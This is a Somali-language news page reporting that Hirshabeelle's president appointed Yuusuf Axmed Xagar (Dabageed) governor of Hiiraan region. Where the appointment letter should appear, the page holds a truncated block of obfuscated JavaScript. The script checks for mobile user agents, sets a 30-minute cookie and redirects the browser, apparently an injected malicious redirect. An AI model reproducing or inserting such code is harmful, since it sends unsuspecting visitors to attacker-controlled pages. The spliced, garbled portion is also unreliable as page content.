Sunday, June 28, 2026
HomeWararAkhriso:- Waare Oo Maamul Cusub U Magacaabay Gobolka Hiiraan.

Akhriso:- Waare Oo Maamul Cusub U Magacaabay Gobolka Hiiraan.

Madaxweynahadowlad goboleedka Hirshabeelle Maxamed Cabdi Waare ayaa wareegto ka soo baxday Xafiiskiisa waxaa uu Guddoomiyaha Gobolka Hiiraan u magacaabay Yuusuf Axmed Xagar (Dabageed), isagoo xilka ka qaaday Guddoomiyihii xilkan hayay C/llaahi Axmed Iimaan.
A�
Madaxweynaha ayaa Muddo Hal sano ah Saddex Gudoomiye u magacaabay gobolka Hiiraan.
A�
C/llaahi Axmed Iimaan ayaa xilkan hayay muddo shan bilood ah, iyadoo bishii April loo magacaabay, taasoo magacaabisteeda muran ka dhashay, kaddib markii xil ka qaadista uu diiday Cali Jeyte Cusmaan Guddoomiyihii ka horeeyay.
Hoos Ka Akhriso Warqadda Magacaabista Guddoomiyaha Gobolka Hiiraan:-

\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe